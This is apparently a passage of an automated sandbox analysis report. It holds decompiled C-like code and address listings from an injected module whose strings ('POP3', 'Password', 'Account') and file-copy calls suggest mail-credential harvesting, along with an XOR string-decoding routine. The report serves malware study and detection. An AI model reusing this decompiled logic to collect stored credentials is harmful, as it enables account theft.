                                                                                                                                                                                                                                                                  						_v12 = (_t109 & 0xffffff00 |  *_t101 != 0x000000d0) + 1;
                                                                                                                                                                                                                                                                  						if(_v8 > 0) {
                                                                                                                                                                                                                                                                  							do {
                                                                                                                                                                                                                                                                  								_t114 =  *((intOrPtr*)(_t146 + _t101));
                                                                                                                                                                                                                                                                  								_t32 = _t114 - 0x21; // -32
                                                                                                                                                                                                                                                                  								if(_t32 > 0x5d || _t114 == 0x3d) {
                                                                                                                                                                                                                                                                  									__eflags =  *_t150;
                                                                                                                                                                                                                                                                  									if( *_t150 != 0) {
                                                                                                                                                                                                                                                                  										_push(_v8);
                                                                                                                                                                                                                                                                  										goto L23;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									 *((char*)(E100044B0(_t150) + _t150)) =  *((intOrPtr*)(_t146 + _t101));
                                                                                                                                                                                                                                                                  									_t80 = E10001DB7(_t150,  &_v148, E100044B0( &_v148));
                                                                                                                                                                                                                                                                  									_t154 = _t154 + 0xc;
                                                                                                                                                                                                                                                                  									if(_t80 != 0) {
                                                                                                                                                                                                                                                                  										L11:
                                                                                                                                                                                                                                                                  										_t81 =  *((intOrPtr*)(_t101 + _t146 + 1));
                                                                                                                                                                                                                                                                  										__eflags = _t81 - 0x5f;
                                                                                                                                                                                                                                                                  										if(_t81 == 0x5f) {
                                                                                                                                                                                                                                                                  											L20:
                                                                                                                                                                                                                                                                  											_push(0x40);
                                                                                                                                                                                                                                                                  											L23:
                                                                                                                                                                                                                                                                  											_push(0);
                                                                                                                                                                                                                                                                  											_push(_t150);
                                                                                                                                                                                                                                                                  											E10002C40(_t146);
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											__eflags = _t81 - 0x2d;
                                                                                                                                                                                                                                                                  											if(_t81 == 0x2d) {
                                                                                                                                                                                                                                                                  												goto L20;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												__eflags = _t81 - 0x30;
                                                                                                                                                                                                                                                                  												if(_t81 < 0x30) {
                                                                                                                                                                                                                                                                  													L19:
                                                                                                                                                                                                                                                                  													_t146 = E100016AA(_t101,  &_v408, _t146, _v12, _t150);
                                                                                                                                                                                                                                                                  													_v16 = 1;
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													__eflags = _t81 - 0x39;
                                                                                                                                                                                                                                                                  													if(_t81 <= 0x39) {
                                                                                                                                                                                                                                                                  														L16:
                                                                                                                                                                                                                                                                  														__eflags = _t81 - 0x5a;
                                                                                                                                                                                                                                                                  														if(_t81 <= 0x5a) {
                                                                                                                                                                                                                                                                  															L18:
                                                                                                                                                                                                                                                                  															__eflags = _t81 - 0x7a;
                                                                                                                                                                                                                                                                  															if(_t81 <= 0x7a) {
                                                                                                                                                                                                                                                                  																goto L20;
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																goto L19;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															__eflags = _t81 - 0x61;
                                                                                                                                                                                                                                                                  															if(_t81 < 0x61) {
                                                                                                                                                                                                                                                                  																goto L19;
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																goto L18;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														__eflags = _t81 - 0x41;
                                                                                                                                                                                                                                                                  														if(_t81 < 0x41) {
                                                                                                                                                                                                                                                                  															goto L19;
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															goto L16;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t154 = _t154 + 0xc;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										_t85 = E10001DB7(_t150,  &_v84, E100044B0( &_v84));
                                                                                                                                                                                                                                                                  										if(_t85 != 0) {
                                                                                                                                                                                                                                                                  											goto L11;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											if(_v16 == _t85 || E10001DB7(_t150,  &_v116, E100044B0( &_v116)) == 0) {
                                                                                                                                                                                                                                                                  												_t88 = E10001DB7(_t150,  &_v52, E100044B0( &_v52));
                                                                                                                                                                                                                                                                  												_t165 = _t88;
                                                                                                                                                                                                                                                                  												if(_t88 != 0) {
                                                                                                                                                                                                                                                                  													goto L10;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												L10:
                                                                                                                                                                                                                                                                  												_t146 = E100016AA(_t101,  &_v10408, _t146, _v12, _t150);
                                                                                                                                                                                                                                                                  												E100015DA(_v20,  &_v408, _t165,  &_v10408, _v12);
                                                                                                                                                                                                                                                                  												_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                                                  												E10002C40(_t146,  &_v408, 0, 0x104);
                                                                                                                                                                                                                                                                  												E10002C40(_t146,  &_v10408, 0, 0x104);
                                                                                                                                                                                                                                                                  												_t154 = _t154 + 0x2c;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t146 = _t146 + 1;
                                                                                                                                                                                                                                                                  							} while (_t146 < _v8);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E10001EE7(_t150);
                                                                                                                                                                                                                                                                  						_t71 = E10001EE7(_t101);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t71;
                                                                                                                                                                                                                                                                  			}











































                                                                                                                                                                                                                                                                  0x10001742
                                                                                                                                                                                                                                                                  0x10001749
                                                                                                                                                                                                                                                                  0x1000174c
                                                                                                                                                                                                                                                                  0x1000175a
                                                                                                                                                                                                                                                                  0x1000175f
                                                                                                                                                                                                                                                                  0x10001761
                                                                                                                                                                                                                                                                  0x10001773
                                                                                                                                                                                                                                                                  0x1000177a
                                                                                                                                                                                                                                                                  0x10001787
                                                                                                                                                                                                                                                                  0x10001790
                                                                                                                                                                                                                                                                  0x1000179d
                                                                                                                                                                                                                                                                  0x100017a7
                                                                                                                                                                                                                                                                  0x100017b0
                                                                                                                                                                                                                                                                  0x100017b1
                                                                                                                                                                                                                                                                  0x100017b3
                                                                                                                                                                                                                                                                  0x100017b6
                                                                                                                                                                                                                                                                  0x100017bc
                                                                                                                                                                                                                                                                  0x100017bf
                                                                                                                                                                                                                                                                  0x100017c6
                                                                                                                                                                                                                                                                  0x100017cd
                                                                                                                                                                                                                                                                  0x100017d4
                                                                                                                                                                                                                                                                  0x100017d4
                                                                                                                                                                                                                                                                  0x100017d9
                                                                                                                                                                                                                                                                  0x100017e0
                                                                                                                                                                                                                                                                  0x100017e1
                                                                                                                                                                                                                                                                  0x100017e3
                                                                                                                                                                                                                                                                  0x100017ea
                                                                                                                                                                                                                                                                  0x100017f1
                                                                                                                                                                                                                                                                  0x100017f4
                                                                                                                                                                                                                                                                  0x100017f5
                                                                                                                                                                                                                                                                  0x100017f6
                                                                                                                                                                                                                                                                  0x100017f7
                                                                                                                                                                                                                                                                  0x100017f8
                                                                                                                                                                                                                                                                  0x100017fe
                                                                                                                                                                                                                                                                  0x100017ff
                                                                                                                                                                                                                                                                  0x10001800
                                                                                                                                                                                                                                                                  0x10001801
                                                                                                                                                                                                                                                                  0x10001802
                                                                                                                                                                                                                                                                  0x10001803
                                                                                                                                                                                                                                                                  0x10001808
                                                                                                                                                                                                                                                                  0x1000180c
                                                                                                                                                                                                                                                                  0x10001812
                                                                                                                                                                                                                                                                  0x10001816
                                                                                                                                                                                                                                                                  0x1000181c
                                                                                                                                                                                                                                                                  0x10001827
                                                                                                                                                                                                                                                                  0x10001829
                                                                                                                                                                                                                                                                  0x1000182d
                                                                                                                                                                                                                                                                  0x10001831
                                                                                                                                                                                                                                                                  0x10001837
                                                                                                                                                                                                                                                                  0x1000183d
                                                                                                                                                                                                                                                                  0x1000183d
                                                                                                                                                                                                                                                                  0x10001840
                                                                                                                                                                                                                                                                  0x10001845
                                                                                                                                                                                                                                                                  0x10001982
                                                                                                                                                                                                                                                                  0x10001985
                                                                                                                                                                                                                                                                  0x10001987
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001987
                                                                                                                                                                                                                                                                  0x10001854
                                                                                                                                                                                                                                                                  0x10001860
                                                                                                                                                                                                                                                                  0x10001877
                                                                                                                                                                                                                                                                  0x1000187c
                                                                                                                                                                                                                                                                  0x10001881
                                                                                                                                                                                                                                                                  0x1000193d
                                                                                                                                                                                                                                                                  0x1000193d
                                                                                                                                                                                                                                                                  0x10001941
                                                                                                                                                                                                                                                                  0x10001943
                                                                                                                                                                                                                                                                  0x1000197e
                                                                                                                                                                                                                                                                  0x1000197e
                                                                                                                                                                                                                                                                  0x1000198a
                                                                                                                                                                                                                                                                  0x1000198a
                                                                                                                                                                                                                                                                  0x1000198c
                                                                                                                                                                                                                                                                  0x1000198d
                                                                                                                                                                                                                                                                  0x10001945
                                                                                                                                                                                                                                                                  0x10001945
                                                                                                                                                                                                                                                                  0x10001947
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001949
                                                                                                                                                                                                                                                                  0x10001949
                                                                                                                                                                                                                                                                  0x1000194b
                                                                                                                                                                                                                                                                  0x10001961
                                                                                                                                                                                                                                                                  0x10001973
                                                                                                                                                                                                                                                                  0x10001975
                                                                                                                                                                                                                                                                  0x1000194d
                                                                                                                                                                                                                                                                  0x1000194d
                                                                                                                                                                                                                                                                  0x1000194f
                                                                                                                                                                                                                                                                  0x10001955
                                                                                                                                                                                                                                                                  0x10001955
                                                                                                                                                                                                                                                                  0x10001957
                                                                                                                                                                                                                                                                  0x1000195d
                                                                                                                                                                                                                                                                  0x1000195d
                                                                                                                                                                                                                                                                  0x1000195f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001959
                                                                                                                                                                                                                                                                  0x10001959
                                                                                                                                                                                                                                                                  0x1000195b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000195b
                                                                                                                                                                                                                                                                  0x10001951
                                                                                                                                                                                                                                                                  0x10001951
                                                                                                                                                                                                                                                                  0x10001953
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001953
                                                                                                                                                                                                                                                                  0x1000194f
                                                                                                                                                                                                                                                                  0x1000194b
                                                                                                                                                                                                                                                                  0x10001947
                                                                                                                                                                                                                                                                  0x10001992
                                                                                                                                                                                                                                                                  0x10001887
                                                                                                                                                                                                                                                                  0x10001896
                                                                                                                                                                                                                                                                  0x1000189f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100018a5
                                                                                                                                                                                                                                                                  0x100018a8
                                                                                                                                                                                                                                                                  0x100018d3
                                                                                                                                                                                                                                                                  0x100018da
                                                                                                                                                                                                                                                                  0x100018dc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100018e2
                                                                                                                                                                                                                                                                  0x100018e2
                                                                                                                                                                                                                                                                  0x10001900
                                                                                                                                                                                                                                                                  0x10001909
                                                                                                                                                                                                                                                                  0x1000190e
                                                                                                                                                                                                                                                                  0x10001920
                                                                                                                                                                                                                                                                  0x10001933
                                                                                                                                                                                                                                                                  0x10001938
                                                                                                                                                                                                                                                                  0x10001938
                                                                                                                                                                                                                                                                  0x100018a8
                                                                                                                                                                                                                                                                  0x1000189f
                                                                                                                                                                                                                                                                  0x10001881
                                                                                                                                                                                                                                                                  0x10001995
                                                                                                                                                                                                                                                                  0x10001996
                                                                                                                                                                                                                                                                  0x1000183d
                                                                                                                                                                                                                                                                  0x100019a0
                                                                                                                                                                                                                                                                  0x100019a6
                                                                                                                                                                                                                                                                  0x100019ac
                                                                                                                                                                                                                                                                  0x10001816
                                                                                                                                                                                                                                                                  0x100019b1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                                                                    • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                                                                    • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                                                                  • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                                                                  • Opcode ID: 12bd9b655301a2609692c6a7949ef28317afe4eec0ae0c5a52c47be9fc205a95
                                                                                                                                                                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12bd9b655301a2609692c6a7949ef28317afe4eec0ae0c5a52c47be9fc205a95
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                                                                                                  			E100019B2(intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				char* _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				char* _v16;
                                                                                                                                                                                                                                                                  				char* _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				char* _v32;
                                                                                                                                                                                                                                                                  				char* _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				char _v44;
                                                                                                                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                                                                                                                  				char _v308;
                                                                                                                                                                                                                                                                  				char _v568;
                                                                                                                                                                                                                                                                  				char _v827;
                                                                                                                                                                                                                                                                  				signed char _v828;
                                                                                                                                                                                                                                                                  				char _v1088;
                                                                                                                                                                                                                                                                  				char _v1348;
                                                                                                                                                                                                                                                                  				char _v11347;
                                                                                                                                                                                                                                                                  				signed int _v11348;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t79;
                                                                                                                                                                                                                                                                  				void* _t88;
                                                                                                                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                                                                                                                  				void* _t105;
                                                                                                                                                                                                                                                                  				void* _t111;
                                                                                                                                                                                                                                                                  				signed int _t115;
                                                                                                                                                                                                                                                                  				signed char _t116;
                                                                                                                                                                                                                                                                  				void* _t120;
                                                                                                                                                                                                                                                                  				char* _t123;
                                                                                                                                                                                                                                                                  				char* _t125;
                                                                                                                                                                                                                                                                  				void* _t126;
                                                                                                                                                                                                                                                                  				signed char _t128;
                                                                                                                                                                                                                                                                  				void* _t132;
                                                                                                                                                                                                                                                                  				char _t137;
                                                                                                                                                                                                                                                                  				char* _t138;
                                                                                                                                                                                                                                                                  				signed char _t139;
                                                                                                                                                                                                                                                                  				intOrPtr _t142;
                                                                                                                                                                                                                                                                  				void* _t151;
                                                                                                                                                                                                                                                                  				char* _t157;
                                                                                                                                                                                                                                                                  				intOrPtr _t159;
                                                                                                                                                                                                                                                                  				intOrPtr _t160;
                                                                                                                                                                                                                                                                  				char* _t163;
                                                                                                                                                                                                                                                                  				char* _t165;
                                                                                                                                                                                                                                                                  				void* _t166;
                                                                                                                                                                                                                                                                  				void* _t167;
                                                                                                                                                                                                                                                                  				void* _t168;
                                                                                                                                                                                                                                                                  				void* _t169;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				0x1000c030();
                                                                                                                                                                                                                                                                  				_t163 = 0;
                                                                                                                                                                                                                                                                  				_v12 = __edx;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t157 = 0;
                                                                                                                                                                                                                                                                  				E10002C40(0,  &_v11348, 0, 0x2710);
                                                                                                                                                                                                                                                                  				E10002C40(0,  &_v308, 0, 0x104);
                                                                                                                                                                                                                                                                  				_v28 = 0x6172647e;
                                                                                                                                                                                                                                                                  				_t72 =  !=  ?  &_v44 :  &_v28;
                                                                                                                                                                                                                                                                  				_v24 = 0x7e6e6f47;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_t123 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v44 = 0x3740467e;
                                                                                                                                                                                                                                                                  				_v40 = 0x7e246d25;
                                                                                                                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v48 =  !=  ?  &_v44 :  &_v28;
                                                                                                                                                                                                                                                                  				_t73 = E100044B0(_v12);
                                                                                                                                                                                                                                                                  				_t168 = _t167 + 0x1c;
                                                                                                                                                                                                                                                                  				if(_t73 != 0) {
                                                                                                                                                                                                                                                                  					while(_t157 == 0) {
                                                                                                                                                                                                                                                                  						_t120 = _t123 + _v12;
                                                                                                                                                                                                                                                                  						_t123 = _t123 + 1;
                                                                                                                                                                                                                                                                  						_t20 = _t120 + 1; // 0x1
                                                                                                                                                                                                                                                                  						_t157 =  !=  ? 0 : _t20;
                                                                                                                                                                                                                                                                  						_v8 = _t157;
                                                                                                                                                                                                                                                                  						_t73 = E100044B0(_v12);
                                                                                                                                                                                                                                                                  						if(_t123 < _t73) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							if(_t157 != 0) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L25;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if( *_t157 != 0) {
                                                                                                                                                                                                                                                                  						_t125 = _t163;
                                                                                                                                                                                                                                                                  						if(E100044B0(_t157) != 0) {
                                                                                                                                                                                                                                                                  							_t165 =  &_v11348;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								_t139 =  *((intOrPtr*)(_t125 + _t157));
                                                                                                                                                                                                                                                                  								if(_t139 - 0x30 > 0x16) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t115 = _t139 & 0x000000ff;
                                                                                                                                                                                                                                                                  								_t116 = _t115 - 0x00000037 & 0x000000ff;
                                                                                                                                                                                                                                                                  								_t142 =  *((intOrPtr*)(_t125 + _t157 + 1));
                                                                                                                                                                                                                                                                  								_t153 =  >=  ? _t116 : _t115;
                                                                                                                                                                                                                                                                  								_t154 = ( >=  ? _t116 : _t115) << 4;
                                                                                                                                                                                                                                                                  								asm("sbb al, al");
                                                                                                                                                                                                                                                                  								_t125 = _t125 + 2;
                                                                                                                                                                                                                                                                  								_t144 = _t142 - (_t116 & 0x000000f9) + 0x37 + (( >=  ? _t116 : _t115) << 4);
                                                                                                                                                                                                                                                                  								 *_t165 = _t142 - (_t116 & 0x000000f9) + 0x37 + (( >=  ? _t116 : _t115) << 4);
                                                                                                                                                                                                                                                                  								_t165 = _t165 + 1;
                                                                                                                                                                                                                                                                  								if(_t125 < E100044B0(_t157)) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t163 = 0;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t126 = E100044B0( &_v11348);
                                                                                                                                                                                                                                                                  						if(_t126 != 0) {
                                                                                                                                                                                                                                                                  							E10002C40(_t157,  &_v827, _t163, 0x103);
                                                                                                                                                                                                                                                                  							_t79 = 0x71;
                                                                                                                                                                                                                                                                  							_t132 = 0x5a;
                                                                                                                                                                                                                                                                  							_t80 =  ==  ? _t132 : _t79;
                                                                                                                                                                                                                                                                  							_t81 = ( ==  ? _t132 : _t79) ^ _v11348;
                                                                                                                                                                                                                                                                  							_v828 = ( ==  ? _t132 : _t79) ^ _v11348;
                                                                                                                                                                                                                                                                  							E10002DB0( &_v827,  &_v11347, E100044B0( &_v11348));
                                                                                                                                                                                                                                                                  							_t88 = E100044B0( &_v308);
                                                                                                                                                                                                                                                                  							_t169 = _t168 + 0x20;
                                                                                                                                                                                                                                                                  							if(_t126 > _t88) {
                                                                                                                                                                                                                                                                  								_t160 = _v48;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									E10004550( &_v308, _t160);
                                                                                                                                                                                                                                                                  									_t111 = E100044B0( &_v308);
                                                                                                                                                                                                                                                                  									_t169 = _t169 + 0xc;
                                                                                                                                                                                                                                                                  								} while (_t126 > _t111);
                                                                                                                                                                                                                                                                  								_t157 = _v8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							E10002C40(_t157,  &_v1088, _t163, 0x104);
                                                                                                                                                                                                                                                                  							E10002C40(_t157,  &_v1348, _t163, 0x104);
                                                                                                                                                                                                                                                                  							E10002C40(_t157,  &_v568, _t163, 0x104);
                                                                                                                                                                                                                                                                  							_t168 = _t169 + 0x24;
                                                                                                                                                                                                                                                                  							if(_t126 > 1) {
                                                                                                                                                                                                                                                                  								_t138 = _t163;
                                                                                                                                                                                                                                                                  								_t42 = _t126 - 1; // -1
                                                                                                                                                                                                                                                                  								_t151 = _t42;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									 *(_t166 + _t138 - 0x43c) =  *(_t166 + _t138 - 0x2c4f) ^  *(_t166 + _t138 - 0x130);
                                                                                                                                                                                                                                                                  									_t138 = _t138 + 1;
                                                                                                                                                                                                                                                                  									_t151 = _t151 - 1;
                                                                                                                                                                                                                                                                  								} while (_t151 != 0);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t49 = _t126 - 1; // -1
                                                                                                                                                                                                                                                                  							_t95 = _t49;
                                                                                                                                                                                                                                                                  							_a4 = _t95;
                                                                                                                                                                                                                                                                  							if(_t95 != 0) {
                                                                                                                                                                                                                                                                  								_t159 = _t95;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_t128 =  *((intOrPtr*)(_t166 + _t163 - 0x43c)) -  *((intOrPtr*)(_t166 + _t163 - 0x338));
                                                                                                                                                                                                                                                                  									_t135 =  >=  ? _t128 & 0x000000ff : _t128 - 0x00000001 & 0x000000ff;
                                                                                                                                                                                                                                                                  									 *((char*)(_t166 + _t163 - 0x540)) =  >=  ? _t128 & 0x000000ff : _t128 - 0x00000001 & 0x000000ff;
                                                                                                                                                                                                                                                                  									_t105 = E100044B0( &_v568);
                                                                                                                                                                                                                                                                  									_t137 =  *((intOrPtr*)(_t166 + _t163 - 0x540));
                                                                                                                                                                                                                                                                  									_t163 = _t163 + 1;
                                                                                                                                                                                                                                                                  									 *((char*)(_t166 + _t105 - 0x234)) = _t137;
                                                                                                                                                                                                                                                                  								} while (_t163 < _t159);
                                                                                                                                                                                                                                                                  								_t157 = _v8;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t73 = E10002DB0(_t157,  &_v568, E100044B0( &_v568) + 2);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_t73 = E10002C40(_t157, _t157, _t163, E100044B0(_t157));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L25:
                                                                                                                                                                                                                                                                  				return _t73;
                                                                                                                                                                                                                                                                  			}



















































                                                                                                                                                                                                                                                                  0x100019ba
                                                                                                                                                                                                                                                                  0x100019c2
                                                                                                                                                                                                                                                                  0x100019c4
                                                                                                                                                                                                                                                                  0x100019d2
                                                                                                                                                                                                                                                                  0x100019d7
                                                                                                                                                                                                                                                                  0x100019d9
                                                                                                                                                                                                                                                                  0x100019eb
                                                                                                                                                                                                                                                                  0x100019fd
                                                                                                                                                                                                                                                                  0x10001a04
                                                                                                                                                                                                                                                                  0x10001a07
                                                                                                                                                                                                                                                                  0x10001a0e
                                                                                                                                                                                                                                                                  0x10001a11
                                                                                                                                                                                                                                                                  0x10001a13
                                                                                                                                                                                                                                                                  0x10001a16
                                                                                                                                                                                                                                                                  0x10001a1d
                                                                                                                                                                                                                                                                  0x10001a24
                                                                                                                                                                                                                                                                  0x10001a27
                                                                                                                                                                                                                                                                  0x10001a2a
                                                                                                                                                                                                                                                                  0x10001a2d
                                                                                                                                                                                                                                                                  0x10001a32
                                                                                                                                                                                                                                                                  0x10001a37
                                                                                                                                                                                                                                                                  0x10001a3d
                                                                                                                                                                                                                                                                  0x10001a45
                                                                                                                                                                                                                                                                  0x10001a48
                                                                                                                                                                                                                                                                  0x10001a4b
                                                                                                                                                                                                                                                                  0x10001a53
                                                                                                                                                                                                                                                                  0x10001a56
                                                                                                                                                                                                                                                                  0x10001a59
                                                                                                                                                                                                                                                                  0x10001a61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001a63
                                                                                                                                                                                                                                                                  0x10001a65
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001a65
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001a61
                                                                                                                                                                                                                                                                  0x10001a6e
                                                                                                                                                                                                                                                                  0x10001a75
                                                                                                                                                                                                                                                                  0x10001a7f
                                                                                                                                                                                                                                                                  0x10001a81
                                                                                                                                                                                                                                                                  0x10001a87
                                                                                                                                                                                                                                                                  0x10001a87
                                                                                                                                                                                                                                                                  0x10001a90
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001a92
                                                                                                                                                                                                                                                                  0x10001a9f
                                                                                                                                                                                                                                                                  0x10001aa2
                                                                                                                                                                                                                                                                  0x10001aa6
                                                                                                                                                                                                                                                                  0x10001aa9
                                                                                                                                                                                                                                                                  0x10001ab0
                                                                                                                                                                                                                                                                  0x10001ab2
                                                                                                                                                                                                                                                                  0x10001abb
                                                                                                                                                                                                                                                                  0x10001abd
                                                                                                                                                                                                                                                                  0x10001abf
                                                                                                                                                                                                                                                                  0x10001ac8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001ac8
                                                                                                                                                                                                                                                                  0x10001aca
                                                                                                                                                                                                                                                                  0x10001aca
                                                                                                                                                                                                                                                                  0x10001ad8
                                                                                                                                                                                                                                                                  0x10001add
                                                                                                                                                                                                                                                                  0x10001aff
                                                                                                                                                                                                                                                                  0x10001b0a
                                                                                                                                                                                                                                                                  0x10001b0d
